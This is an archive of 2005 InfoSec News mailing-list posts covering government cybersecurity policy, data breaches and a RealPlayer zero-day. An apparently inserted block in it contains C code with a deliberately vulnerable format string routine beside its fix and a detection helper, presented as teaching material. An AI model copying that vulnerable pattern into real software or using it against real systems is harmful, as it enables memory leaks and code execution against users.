"Unfortunately, the government is not funding much research in cybersecurity and almost none in long-range research," said Spafford, who is also executive director of Purdue's Center for Education and Research in Information Assurance and Security.

He cited President Bush's decision in June to let the President's Information Technology Advisory Committee expire without reappointing current members or selecting new ones.

Spafford said the threat to DOD networks is varied and complex. "In large part, the systems used are based on commercial products that were never written for high-security environments," he added.

Spafford said misconfigured or misapplied patches create vulnerabilities that are exacerbated by having systems linked together. "It means that any weak point can be accessed from all sorts of places and can in turn reach out to damage lots of other military systems," he said.

Clint Kreitner, president and chief executive officer of the Center for Internet Security, a nonprofit organization that helps government and industry officials better manage computer security risks, said DOD should limit access to certain networks.

Alan Paller, director of research at the SANS Institute, said government and industry should avoid using new information assurance technologies that vendors claim are impervious to attacks. Instead, he said, they should anticipate new threats 18 months in advance and develop technologies and policies to address them.

A Defense Information Systems Agency official said DOD relies on a sophisticated approach to information assurance. The official added that the department is changing how it builds systems by moving to a service-oriented architecture that will make IT services widely available on the network and improve data sharing governmentwide.

"We are doing this in order to make more and better data available to more people in DOD and to our partners, and as a way of increasing our agility and our ability to innovate in the development of warfighting processes based on these services," the DISA official said.

DOD also changed its approach to network operations.
The official said the department has moved to a structure that puts the Joint Task Force-Global Network Operations in charge of operating, managing and defending DOD's information infrastructure, with organizations in the military services reporting to the joint task force.

DOD relies on its global networks and IT to achieve its mission, and the country's adversaries recognize DOD's dependence on networks and electronic information, the DISA official said.

"The DOD networks are very large," the official said. "So we have many challenges in synchronizing the many IT efforts and security for these across this vast infrastructure."

From isn at c4i.org Wed Sep 28 00:47:18 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 28 00:53:23 2005
Subject: [ISN] SE Linux embarks on Common Criteria testing
Message-ID:

http://www.gcn.com/vol1_no1/daily-updates/37131-1.html

By Joab Jackson
GCN Staff
09/27/05

The National Security Agency's Security Enhanced Linux [1] has started to undergo Common Criteria evaluation. Earlier this month, IBM Corp. submitted Red Hat Enterprise Linux v.5 (RHEL 5) - which includes the SE Linux module - for Evaluation Assurance Level 4.

With the evaluation in place, this version of Linux, available from Red Hat Inc. of Raleigh, N.C., in late 2006, could offer another trusted operating system for handling sensitive information. Traditionally, Sun Microsystems Inc.'s Trusted Solaris operating system has dominated this market.

"This allows our traditional customer base to look at Linux as a viable alternative," said Ed Hammersla, chief operating officer of Trusted Computer Solutions Inc. of Herndon, Va. Trusted Computer has developed some of the extensions to SE Linux that were incorporated into RHEL 5.

Atsec Information Security of Austin, Texas, is evaluating RHEL 5 on a number of IBM servers, including the xSeries, pSeries and zSeries mainframes, as well as IBM blade servers.

IBM announced earlier this year that it would submit [2] SE Linux to the National Information Assurance Partnership's Common Criteria Evaluation and Validation Scheme.

SE Linux is a set of software controls that can be used with Linux to confine the actions of any process to a predetermined set of options, allowing for far finer grained policy-based management of applications than conventional operating systems offer.

"We're moving away from discretionary access control, so the permissions for usage are out of the hands of users and rogue programs," said Paul Smith, head of Red Hat's government office.

SE Linux lays the groundwork for Trusted Computer Solutions' Application Suite, for instance, which permits a single computer to run multiple security levels. This multilevel security approach eliminates the need to keep multiple computers at a single desktop, each for a different security level.

Hammersla noted that because RHEL 5 is under evaluation, agencies can use it to fulfill NSTISSP No. 11 National Policy, which calls [3] for Common Criteria-certified products to be used on networks that carry sensitive information.

Although Red Hat won't officially release RHEL 5 until late next year, users can test early implementations available [4] through the Fedora Linux distribution, a volunteer effort that packages beta issues of Red Hat Enterprise Linux. Purchasers of Trusted Computer Solutions' Application Suite can also get the operating system, since it is included in that software package as well.

[1] http://www.nsa.gov/selinux/
[2] http://www.gcn.com/24_8/tech-report/35516-1.html
[3] http://www.gcn.com/21_31/news/20302-1.html
[4] http://www.fedoracore.org/

From isn at c4i.org Wed Sep 28 00:47:47 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 28 00:54:21 2005
Subject: [ISN] FinCEN Web Site Compromised
Message-ID:

http://www.securitiesindustry.com/article.cfm?articleid=16211

By John Sandman
Standards Editor
September 27, 2005

The Financial Crimes Enforcement Network's (FinCEN) QuikNews Web site was hacked last week. The identity and location of those responsible have yet to be determined. The Treasury Department agency, responsible for enforcing regulations against money laundering and terrorist financing, responded by closing down the news site.

A mass e-mail went out from the FinCEN QuikNews address last Friday that contained two photos, one showing a street in what appeared to be a Middle Eastern town or city with a large pool of blood. The other was of a purported Iraqi child lying in what appeared to be a hospital bed next to a woman dressed in a chador. Above the photos was the caption: "take back your monsters (army)/you killed my father and mother/what you want???/ i know (oil) [sic]."

The e-mail, which carried the apparently legitimate FinCEN QuikNews return address, was time-stamped at 10:02 Friday morning, a day before an anti-war demonstration in Washington. No one from FinCEN commented on any possible link between the demonstration and the timing of the security breach, or the fact that a Treasury Department official was speaking on terrorist financing and money laundering at a conference in Washington, D.C. when the breach occurred.

At 10:25 FinCEN sent its own message: "You may have received a message this morning which appeared to originate from FinCEN's QuickNews system. This message was not sent by FinCEN and we are currently investigating its origins."
A second message, which described QuikNews as a subscriber-based e-mail service that is hosted externally and is separate from FinCEN's main Web-based operations, said QuikNews, "appears to have been compromised this morning. We are investigating this incident." Because the compromised system is "outside FinCEN's security perimeter and is not connected to other FinCEN systems," the message continued, "Bank Secrecy Act data and all other sensitive information maintained by FinCEN was in no way, shape or form compromised by this incident." As of 5:00 p.m. the site was shut down permanently and FinCEN said it planned to reinstitute a notification service without reusing the same mailing list. FinCEN contacted law enforcement agencies, but spokesperson Anne Marie Kelly did not identify which ones. Data security has long been a preoccupation of the securities industry, even before the attacks on New York and Washington, D.C. on Sept. 11, 2001. The House Government Reform Subcommittee on Management, Finance and Accountability is holding hearings on the subject this week, with Nasdaq CIO Steve Randich expected to testify. The timing of the FinCEN incident was made more awkward by a Sept. 23 speech that was being given at a World Bank-IMF program in Washington, D.C. by Daniel L. Glaser, acting assistant secretary of terrorist financing and financial crimes at the Treasury. "The international financial system is only as strong as its weakest link," Glaser stated during his panel, which was assembled to bring together policy makers and regulators that were building effective anti-money-laundering and -terrorist-financing systems. "Financial centers that are susceptible to abuse provide terrorists and criminals with access to the international financial system as a whole. Therefore, efforts to combat terrorist financing must be uniform and global. Laxity in just a few jurisdictions undermines the efforts made by the rest." 
From isn at c4i.org Wed Sep 28 00:48:00 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 28 00:54:51 2005 Subject: [ISN] Tax breaks for cybersecurity firms? Message-ID: http://beta.news.com.com/Tax+breaks+for+cybersecurity+firms/2100-7348_3-5884149.html By Anne Broache Staff Writer, CNET News.com September 27, 2005 WASHINGTON -- Congress may offer tax breaks to companies that adopt good cybersecurity standards, the chairman of a House of Representatives subcommittee said Tuesday. But in legislating cybersecurity guidelines, lawmakers should avoid heavy-handed regulations, Rep. Dan Lungren, a California Republican, said in a lunch speech here. "My fear is if we do that, we'll stifle innovation," he said. "How can we predict what the best way will be (to manage cybersecurity) in most of these instances?" Lungren said the U.S. House of Representatives cybersecurity subcommittee, which he chairs, is working on crafting an "overall view of ways we can work with the private sector" to develop cybersecurity tools, including the possibility of creating an incentive-based system. Lawmakers also plan to address liability concerns, he said, as they want to allow companies to take some risks in coming up with new cybersecurity tools without having to worry about being sued if they fall short. Andy Purdy, acting director of the Department of Homeland Security's National Cybersecurity Division, said in a speech that his agency is also working closely with the private sector to equip itself for responding to cyberattacks. Purdy said he expects Homeland Security Secretary Michael Chertoff to announce "in the near future" the appointment of an assistant secretary for cybersecurity and telecommunications--a position approved by Congress during the spring. That official would be in charge of coordinating cybersecurity efforts among different agencies and research groups, Purdy said. 
The agency, which has already flunked a cybersecurity preparedness test, is also gearing up for a November exercise, dubbed Cyberstorm, intended to give the government a chance to role-play its way through a mock cyberattack. From isn at c4i.org Wed Sep 28 00:48:13 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 28 00:55:24 2005 Subject: [ISN] FBI checking theft of Dain clients' data Message-ID: http://www.startribune.com/stories/535/5638740.html Thomas Lee Star Tribune September 28, 2005 The FBI has opened an investigation into the possible theft of personal information about some clients of RBC Dain Rauscher Inc. The chief executive of the Minneapolis-based brokerage firm disclosed the problem in a letter sent to 300,000 households. Dain Rauscher has not yet detected any fraudulent activity in their accounts, according to the letter from Dain head John Taft. "While we have no information to believe that your personal information has been compromised in any way, we are treating this as a serious situation," Taft wrote. FBI agent Paul McCabe said the agency does not know how many accounts might be affected. Dan Callahan, a Dain Rauscher spokesman, said some clients have received anonymous letters sent last week by someone claiming to be a former Dain employee. The letter, received by a seemingly random group of more than 100 account holders, contained each recipient's name, address, tax identification number, birthdate and Dain Rauscher account number. The Star Tribune obtained a copy of the profanity-laced letter, whose author said he was seeking revenge on Dain Rauscher because the company fired him. The writer claims to have been able to copy information from "thousands" of accounts because Dain Rauscher did not remove his password from a mainframe computer. He claims to have sold the information to an unidentified buyer. "It is Dain Rauscher's [mistake] that I did this so blame them," the letter says. 
"Call a TV station, ask them to call Dain and find out how the idiots are going to fix this." Callahan said the company, which like other brokerage houses has experienced heavy turnover in recent years, routinely changes passwords when an employee leaves the firm. Nevertheless, Dain is reviewing its security procedures and has hired an outside firm that specializes in identity theft. "We are a victim, just like our clients," Callahan said. "We take their protection very seriously." The company is asking people who receive the letter to contact Dain immediately. Callahan said that customers should place the letter in a plastic bag because it might contain fingerprints. The company is turning the letters over to the FBI. McCabe declined to comment further except to say that the FBI is "vigorously" pursuing the case. The incident is the latest case involving the potential theft of personal information from financial institutions such as banks and credit-card companies. In February, MasterCard International Inc. said a computer hacker may have accessed personal information of as many as 40 million credit card holders. And late last year, Wells Fargo & Co. said four laptop computers were stolen from an Atlanta company that prints loan statements. The computers contained names, addresses and Social Security numbers of an undisclosed number of customers who have mortgages and student loans with the bank. Copyright 2005 Star Tribune. All rights reserved. From isn at c4i.org Wed Sep 28 00:46:40 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 28 00:56:09 2005 Subject: [ISN] Zero-Day Exploit Exposes RealPlayer Users to Attack Message-ID: http://www.eweek.com/article2/0,1895,1864076,00.asp By Ryan Naraine September 27, 2005 An independent security researcher on Tuesday posted an advisory - with zero-day exploit code - for a potentially dangerous security hole in media players marketed by RealNetworks Inc. 
The vulnerability, which remains unpatched, has been confirmed in RealPlayer version 10.0.5.756 (gold) and affects only the Linux/Unix platforms. Security alerts aggregator Secunia Inc. rates the bug as "highly critical" and warned that a malicious hacker could run a successful exploit to take complete control of a vulnerable machine. The vulnerability was discovered and reported to RealNetworks by a researcher known simply as "c0ntex." In a warning posted to the Open-Security Web site, the researcher described the issue as a "remotely exploitable format string vulnerability" that allows an attacker to "execute a remote shell under the permissions of the user running the media player." He said the bug affects all versions of RealPlayer and Helix Player (Unix and Linux) and can be exploited by manipulating media files, including ".rp" (RealPix) and ".rt" (RealText) file formats. In the advisory, "c0ntex" provides a detailed explanation of the flaw and code that can be used to launch an attack. The exploit code was reproduced at FrSIRT (French Security Incident Response Team), a Web site that is widely used by underground hackers. "To exploit this remotely, [an attacker] just needs to place the created file on a Web site and provide a link so users can click the file, launching RealPlayer and exploiting the vulnerability," he added. Software vendors, including big names like Microsoft Corp. and Oracle Corp., have sharply criticized third-party hackers who release flaw warnings and zero-day proof-of-concept exploits, insisting that the practice puts users at risk of attack. In this case, "c0ntex" said he was working privately with RealNetworks on a patch but decided to release the exploit to prevent someone from stealing his work. "[I]t seems someone is trying to pinch my research, as such I have been forced to release this advisory sooner than hoped. 
Until [RealNetworks can] get a new release out, do not play untrusted media with RealPlayer or Helix Player," the researcher said. He even added an apology to the Seattle-based digital media delivery company. This is not the only unpatched flaw in the RealPlayer software. eEye Digital Security's list of upcoming advisories includes two high-risk vulnerabilities in the widely deployed media player. According to eEye, RealNetworks has been working on a fix since early July. Both flaws could open the door for malicious code execution attacks. From isn at c4i.org Wed Sep 28 00:47:04 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 28 00:56:37 2005 Subject: [ISN] RP only ASEAN nation with hacked military Web domain Message-ID: Forwarded from: security curmudgeon : http://www.mb.com.ph/INFO2005092345065.html : : By Melvin G. Calimag : Sept 23, 2005 : : To illustrate how hacking and cracking have become widespread in the : Internet, a security firm said the Philippines is the only country in : the Southeast Asian (SEA) region, and possibly in the whole world, whose : military domain address (mil.ph) has been hacked several times in the : last six years. : From 1999 to 2005, a total of nine attacks were recorded under the : country's military domain name, said 3Com senior manager for security : Ken Low in a recent press briefing. Does anyone at Tipping Point want to cite their sources for all this information? Last I checked, they weren't in the business of monitoring web site defacements to this degree, especially dating back to 1999.. 
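The eWeek item above on the RealPlayer/Helix Player hole describes it as a "remotely exploitable format string vulnerability" reached through text fields in .rp (RealPix) and .rt (RealText) files. What follows is an added example for this digest, not code from c0ntex's advisory, from RealNetworks or from any of the articles: it shows in C what that bug class looks like in a media parser, as a vulnerable routine beside the one-token fix, plus a small directive counter a parser can apply to untrusted text as defence in depth. The function names (emit, render_title_vuln, render_title_safe, count_directives) and the sample title strings are invented for the demonstration and say nothing about RealPlayer's actual parser.

```c
/* Added example for this digest; not code from c0ntex's advisory or from
 * RealNetworks. It shows the format string bug class the advisory names,
 * with invented function names and constructed sample input. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* A logging/rendering wrapper of the kind that usually hides this bug:
 * whatever the caller hands over becomes the format string. */
static int emit(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    int len;
    va_start(ap, fmt);
    len = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return len;
}

/* VULNERABLE: the text field read from the media file *is* the format
 * string, so every '%' the file's author wrote is obeyed. "%x" reads an
 * argument slot the caller never supplied (an information leak), "%s"
 * dereferences one as a pointer (a crash or worse), and "%n" writes the
 * count of emitted bytes through one (the write primitive behind a
 * "remote shell under the permissions of the user"). */
int render_title_vuln(const char *title, char *out, size_t n)
{
    return emit(out, n, title);
}

/* FIXED: the untrusted text is only ever an argument; the format string
 * is a literal the program controls. This is the whole patch. */
int render_title_safe(const char *title, char *out, size_t n)
{
    return emit(out, n, "%s", title);
}

/* Defence in depth for a parser that must never let text reach a format
 * function: count conversion directives in untrusted input. "%%" is the
 * escaped literal percent and is not counted; a trailing lone '%' is. */
int count_directives(const char *s)
{
    int count = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* escaped percent: skip both characters */
            s++;
            continue;
        }
        count++;
    }
    return count;
}

int main(void)
{
    /* Constructed sample text fields, as an attacker could place them in a
     * RealText (.rt) or RealPix (.rp) file. */
    const char *benign = "Clip 1: 100%% complete";
    const char *leak   = "%08x";   /* reads one unsupplied argument slot */
    char out[64];

    render_title_vuln(benign, out, sizeof out);
    printf("vuln : %s\n", out);    /* the engine consumed the "%%" */
    render_title_safe(benign, out, sizeof out);
    printf("safe : %s\n", out);    /* text passed through verbatim */

    render_title_vuln(leak, out, sizeof out);
    printf("vuln : %s   <- 8 hex digits of whatever sat in the slot\n", out);
    render_title_safe(leak, out, sizeof out);
    printf("safe : %s\n", out);

    printf("directives in \"%%s%%s%%n\": %d\n", count_directives("%s%s%n"));
    return 0;
}
```

Only the leak case is exercised, because "%s" and "%n" inputs would dereference or write through unsupplied argument slots, which is exactly the path to code execution the advisory warns about. Two practitioner notes: the wrapper above hides the bug from gcc's -Wformat-security, which only inspects functions it knows are printf-like, so give such wrappers __attribute__((format(printf, 3, 4))) and the vulnerable caller is flagged again; and the directive counter is a tripwire for a parser, not a substitute for the "%s" fix.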
From isn at c4i.org Wed Sep 28 00:47:34 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 28 00:58:00 2005 Subject: [ISN] IG: Better security needed for key Coast Guard database Message-ID: Forwarded from: William Knowles http://www.washingtontechnology.com/news/1_1/daily_news/27078-1.html By Alice Lipowicz Staff Writer 09/27/05 The Coast Guard does not have adequate database security controls for its Marine Information for Safety and Law Enforcement (MISLE) system, which contains sensitive but unclassified information for Coast Guard missions, according to a new report [1] from Homeland Security Department Inspector General Richard Skinner. MISLE is a Web-based database system used to track marine safety and law-enforcement activities involving commercial and recreational vessels. It contains information on Coast Guard waterway details, vessel and facility inspection information and incident investigation. The Vessel Documentation System, which tracks vessel ownership, also is accessible to personnel using the MISLE. Although the Coast Guard has implemented many controls for the system, it has not established effective procedures for monitoring user access, nor has it developed an adequate IT contingency plan, the report said. Furthermore, there are vulnerabilities on Coast Guard database servers related to access rights, password administration, configuration management and encryption. "Due to these database security exposures, there is an increased risk that unauthorized individuals could gain access to critical Coast Guard database resources and compromise the confidentiality, integrity and availability of sensitive MISLE data," the report stated. "In addition, the Coast Guard may not be able to recover MISLE following a disaster." The inspector general recommended the Coast Guard implement adequate controls and develop an IT contingency plan for the system, and apply corrective actions to all other databases as well. 
Coast Guard officials, in their response, agreed with most of the findings and recommendations. [1] http://www.dhs.gov/interweb/assetlibrary/OIGr_05-31_Aug05.pdf *==============================================================* "Communications without intelligence is noise; Intelligence without communications is irrelevant." Gen Alfred. M. Gray, USMC ================================================================ C4I.org - Computer Security, & Intelligence - http://www.c4i.org *==============================================================* From isn at c4i.org Thu Sep 29 00:27:45 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 29 00:35:36 2005 Subject: [ISN] Purdy: DHS will ramp up cybersecurity Message-ID: http://www.washingtontechnology.com/news/1_1/daily_news/27084-1.html By Alice Lipowicz Staff Writer 09/28/05 The Homeland Security Department has drafted a set of key scenarios for possible cyberattacks against the Internet and critical IT systems, and is seeking comments from the private sector on how to best prepare and respond to such attacks, according to Andy Purdy, acting director of DHS' National Cybersecurity Division. DHS officials and the White House also are putting the finishing touches on a new national cybersecurity research and development plan, Purdy said earlier this week at a seminar on Capitol Hill. The event was sponsored by Nortel Networks Corp., a global telecommunications equipment manufacturer based in Brampton, Ontario. "At DHS we recognize the importance of cybersecurity risks and we are energized by that risk," Purdy said. Homeland Security Secretary Michael Chertoff also is preparing to name an assistant secretary for cybersecurity and telecommunications, he said. Purdy outlined several initiatives undertaken by his division to bolster cybersecurity and to prepare for a national cyberattack exercise known as Cyber Storm in November. 
As part of their planning for disaster recovery for IT systems, DHS officials are looking at key dependency elements, such as maintaining adequate electrical power supplies, as critical parts of the recovery, Purdy said. The department is working with advisers to prepare plans for maintaining Internet operation following a catastrophe, and also focusing on Internet-based control and process systems, which are IT systems that control the daily operations and interrelations of many plants and utilities. "Control and process systems are one of our major priority efforts - it's a huge challenge and a significant cybersecurity risk," Purdy added. DHS also is meeting with software industry groups to promote shared responsibility for cybersecurity. "It's not just the responsibility of end users. The hardware and software makers need to do a better job to reduce vulnerabilities so we can all be safer," he said. For example, the industry needs to develop tools to make sure that software does not include secret back doors and malicious code, he said. Also at the event, Nortel CEO Bill Owens warned that a catastrophic cyberattack against the Internet could create a "virtual [Hurricane] Katrina" that would reverberate throughout the U.S. economy. Owens said the growing threat over the next two or three years is coming from new viruses that may attack wireless devices and mobile phones, which can then infect broadband networks, government computers and mission-critical IT systems. He said China, India and South Korea take the risks more seriously than does the United States. "I am frightened as hell about this issue of cybersecurity because we see it in spades around the world," Owens said. 
From isn at c4i.org Thu Sep 29 00:23:03 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 29 00:36:04 2005 Subject: [ISN] Computer breach reported at UGA Message-ID: http://www.ajc.com/metro/content/metro/0905/29ugabreach.html By KELLY SIMMONS The Atlanta Journal-Constitution Published on: 09/29/05 ATHENS - A hacker broke into a computer database at the University of Georgia, gaining access to the Social Security numbers of employees in the College of Agricultural and Environmental Sciences and people who are paid from that department. More than 2,400 numbers, belonging to roughly 1,600 people, may have been exposed, UGA spokesman Tom Jackson said Wednesday. The names and numbers were not connected on the documents, Jackson said, but an experienced hacker could be able to interpret the data well enough to match them. No credit card information was on the database. The break-in apparently came from "an automated source outside the country," UGA officials said. The university is attempting to contact individuals whose names were in the database to warn them of potential identity theft. UGA officials discovered the break-in last week. The Georgia Bureau of Investigation and the FBI are looking into the security breach. This is the second time in two years that computer hackers have broken into a database at UGA. In January 2004, intruders gained access to a server that contained the names, Social Security numbers, birth dates and credit card information of students who had applied to UGA since 2002. No one has been arrested in connection with that incident, Jackson said. In May of this year, Georgia Southern and Valdosta State universities each reported that hackers had gained access to personal information on their computer databases. 
From isn at c4i.org Thu Sep 29 00:27:16 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 29 00:36:34 2005 Subject: [ISN] Security UPDATE -- Reading EULAs Can Help Prevent Spyware Infiltration -- September 28, 2005 Message-ID: ==================== This email newsletter comes to you free and is supported by the following advertisers, which offer products and services in which you might be interested. Please take a moment to visit these advertisers' Web sites and show your support for Security UPDATE. Symantec LiveState Patch Manager http://list.windowsitpro.com/t?ctl=14B65:4FB69 Filtering the Spectrum of Internet Threats: Defending Against Inappropriate Content, Spyware, IM, and P2P at the Perimeter http://list.windowsitpro.com/t?ctl=14B4E:4FB69 ==================== 1. In Focus: Reading EULAs Can Help Prevent Spyware Infiltration 2. Security News and Features - Recent Security Vulnerabilities - Microsoft Boosts Its Ability to Provide End-to-End PKI Solutions - New Microsoft Tool Locks Down Shared XP Systems 3. Security Toolkit - Security Matters Blog - FAQ - Security Forum Featured Thread 4. New and Improved - Control Endpoint Media Devices ==================== ==== Sponsor: Symantec ==== Symantec LiveState Patch Manager Symantec LiveState Patch Manager allows you to reliably protect your infrastructure from vulnerabilities. Its intuitive interface allows organizations to scan, identify and install missing patches on hundreds of clients and servers in minutes. Flexible grouping capabilities allow the targeting of patches to specific groups of users. Provides detailed patch status reports. Persistent delivery assures patches are successfully delivered and applied, helping ensure clients are secure and protected. 
LiveState Patch Manager is a member of a family of modular solutions that work on their own--with tools you may already have--and can be assembled into a broader suite if desired, leveraging a common look-and-feel, management database and agent deployment infrastructure. To learn more, visit us at: http://list.windowsitpro.com/t?ctl=14B65:4FB69 ==================== ==== 1. In Focus: Reading EULAs Can Help Prevent Spyware Infiltration by Mark Joseph Edwards, News Editor, mark at ntsecurity / net Does anybody (except lawyers) really like reading End User License Agreements (EULAs)? For that matter, does anybody like reading privacy statements? I doubt it. But it's something we all should do because if we don't, we can eventually wind up with all kinds of spyware on our networks that could lead to serious problems. For example, you might download a slick-looking desktop tool, click to accept the EULA without reading it, then later find out that the tool has been recording all your Web and email activity and sending that information to someone's data collection center. In another scenario, you might install the latest IM and chat tool. If you don't read the privacy policy, you might not know that the company providing the tool reserves the right to track who you contact, how often you transfer data, and more. That's just the tip of the iceberg. In fact, poorly written EULAs and privacy statements, along with people's unwillingness to read them carefully, have spawned an entire multimillion- (if not billion-) dollar industry that now focuses exclusively on the elimination of spyware. When surfing the Web last week, I came across an interesting story at Techdirt that points out just how lackadaisical people can be when it comes to reading EULAs. Techdirt pointed out an experiment conducted by PC Pitstop (at the URL below). The company embedded in one of its EULAs an offer of $1000 to the first person who simply asked for it! 
More than 3000 people downloaded the software before somebody actually asked for the check! http://list.windowsitpro.com/t?ctl=14B63:4FB69 A few weeks ago, I learned about a new tool, EULAlyzer from Javacool Software (at the URL below), which as the name implies is designed to help you analyze EULAs to look for areas that might need extra attention. It works by scanning for keywords. It then links to areas that contain those keywords so that you can review those spots. I tested EULAlyzer on a EULA and found that it did point me to some key phrases that I needed to read more closely, but it certainly didn't eliminate the need for me to read the entire EULA carefully. http://list.windowsitpro.com/t?ctl=14B61:4FB69 Last week, I learned about another tool, currently called Project Truth Serum (read about it at the first URL below), that will help analyze EULAs. That tool is being developed by Facetime Communications (at the second URL below) and is currently in closed beta testing, so I didn't have a chance to try it. But based on the sample output, which you can view at the third URL below, the tool provides similar functionality to EULAlyzer. http://list.windowsitpro.com/t?ctl=14B5B:4FB69 http://list.windowsitpro.com/t?ctl=14B67:4FB69 http://list.windowsitpro.com/t?ctl=14B54:4FB69 I don't see any reason why EULA analyzers couldn't be made to analyze privacy statements. But when I tried EULAlyzer on a tool's privacy statement, it didn't flag anything as suspect, even though the statement did indicate that my use of the tool would be tracked. But maybe at some point, Javacool and/or Facetime will upgrade their analyzers to also work on privacy statements. At any rate, both of these tools are essentially designed to help guard against spyware. Although they're useful to some extent, they certainly aren't replacements for careful reading, nor are they designed to offer you legal advice. 
They are simply helper applications that might prevent you from overlooking something in a given EULA. If you're interested in this sort of helper application, try EULAlyzer and keep an eye out for Facetime's eventual product release. ==================== ==== Sponsor: St. Bernard Software ==== Filtering the Spectrum of Internet Threats: Defending Against Inappropriate Content, Spyware, IM, and P2P at the Perimeter Because of the proliferation of Web-based threats, you can no longer rely on basic firewalls as your sole network protection. Attackers continue to evolve clever methods for reaching victims, such as sending crafty Web links through Instant Messaging (IM) clients or email, or by simply linking to other Web sites that your employees might surf. This free white paper examines the threats of allowing unwanted or offensive content into your network and describes the technologies and methodologies to combat these types of threats. Get your free copy now! http://list.windowsitpro.com/t?ctl=14B4E:4FB69 ==================== ==== 2. Security News and Features ==== Recent Security Vulnerabilities If you subscribe to this newsletter, you also receive Security Alerts, which inform you about recently discovered security vulnerabilities. You can also find information about these discoveries at http://list.windowsitpro.com/t?ctl=14B56:4FB69 Microsoft Boosts Its Ability to Provide End-to-End PKI Solutions Microsoft announced that it has acquired privately held Alacris, maker of identity and access-management solutions. The acquisition puts Microsoft in a better position to offer end-to-end solutions and to take the solutions beyond the enterprise environment and out to consumers. http://list.windowsitpro.com/t?ctl=14B5C:4FB69 New Microsoft Tool Locks Down Shared XP Systems Microsoft released a new toolkit that helps you lock down shared Windows XP systems. 
The new Shared Computer Toolkit for Windows XP includes three parts, including a disk protection tool, user restrictions tool, and an accessibility tool. http://list.windowsitpro.com/t?ctl=14B5F:4FB69 ==================== ==== Resources and Events ==== Exploit the Opportunities of a Wireless Fleet With the endless array of mobile and wireless devices and applications, it's hard to decide what you can do with the devices beyond providing mobile email access. It's even tougher to know how to keep it all secure. Join industry guru Randy Franklin Smith in this free Web seminar and discover what you can do to leverage your mobile and wireless infrastructure, how to pick devices that are right for you, and more! http://list.windowsitpro.com/t?ctl=14B50:4FB69 Get Ready for the SQL Server 2005 Roadshow in Europe Back By Popular Demand--Get the facts about migrating to SQL Server 2005! SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database-computing environment. Receive a one-year membership to PASS and a one-year subscription to SQL Server Magazine. Register now. http://list.windowsitpro.com/t?ctl=14B52:4FB69 Are You Walking the Tightrope Between Recovery and Continuity? There's a big difference between the ability to quickly recover lost or damaged data and the ability to keep your messaging operations running normally before, during, and after an outage. In this free Web seminar, you'll learn what the technical differences are between recovery and continuity, when each is important, and what you can do to make sure that you're hitting the right balance between them. http://list.windowsitpro.com/t?ctl=14B51:4FB69 Streamline Desktop Deployments--Free Web Seminar and White Paper! 
Managing desktop software configurations doesn't have to be a manual process, resulting in unplanned costs, deployment delays, and client confusion. In this on-demand Web seminar, find out how to manage the software package preparation process and increase your desktop reliability, user satisfaction, and IT cost effectiveness. Plus-- register today and receive a free industry white paper on standardizing the software packaging process. http://list.windowsitpro.com/t?ctl=14B4F:4FB69 Deploy VoIP and FoIP Technologies Voice over IP (VoIP) is the future of telecommunications and many companies are already enjoying the benefits of transporting voice over IP networks to significantly reduce telephone and facsimile costs. Join industry expert David Chernicoff for this free Web seminar to learn the ins and outs of boardless fax in IP environments, tips for rolling out fax, integrating fax with telephony technologies, and more! http://list.windowsitpro.com/t?ctl=14B55:4FB69 ==================== ==== Featured White Paper ==== Supercharging SMS for Effective Asset Management Cost control and license compliance have risen to the top of the IT asset and desktop management agenda. Learn to map Microsoft's SMS to specific business objectives and examine the pitfalls of relying solely on SMS to achieve business IT asset management objectives. Download this free white paper now and find out how you can leverage technology to bridge the gap between technical professionals and your CFO. http://list.windowsitpro.com/t?ctl=14B4C:4FB69 ==================== ==== 3. Security Toolkit ==== Security Matters Blog: Are Most Desktop Firewalls too Complicated? by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=14B62:4FB69 An interesting assertion is that Windows Firewall is enough for most people because they aren't capable of making informed decisions about whether to allow certain outbound network traffic. 
If that's true, is it just that such people need a more intuitive interface and possibly a little education? Read the rest of this blog entry for more about this subject and post your comments to share your opinion with other readers.
http://list.windowsitpro.com/t?ctl=14B5E:4FB69

FAQ
by John Savill, http://list.windowsitpro.com/t?ctl=14B60:4FB69

Q: How do I log on to Windows Vista using a domain account?

Find the answer at
http://list.windowsitpro.com/t?ctl=14B5D:4FB69

Security Forum Featured Thread: Problem with Windows Update
A forum participant writes that when he tries to access Windows Update he receives the message "The website has encountered a problem and cannot display the page you are trying to view." This occurs just after the site informs him that it's checking for the latest updates. He said this happens only on one server and wonders if anyone knows what the problem might be. Join the discussion at
http://list.windowsitpro.com/t?ctl=14B4D:4FB69

====================

==== Announcements ====
(from Windows IT Pro and its partners)

Stay Up-to-Date with the Windows IT Security Newsletter
Every issue of Windows IT Security features related product coverage of the best security tools available and expert advice on the best way to implement security. Our expanded content includes even more fundamentals on building and maintaining a secure enterprise. In addition, paid subscribers get access to our entire online security article database (more than 1900 articles)! Subscribe today:
http://list.windowsitpro.com/t?ctl=14B58:4FB69

VIP Monthly Online Pass = Quick Security Answers!
Sign up today for your VIP Monthly Online Pass and get 24/7 access to the entire Windows IT Security online article database, including exclusive subscriber-only content. That's a database of more than 1900 security articles to help you get all the answers you need, when you need them. Sign up now:
http://list.windowsitpro.com/t?ctl=14B59:4FB69

====================

==== 4. New and Improved ====
by Renee Munshi, products@windowsitpro.com

Control Endpoint Media Devices
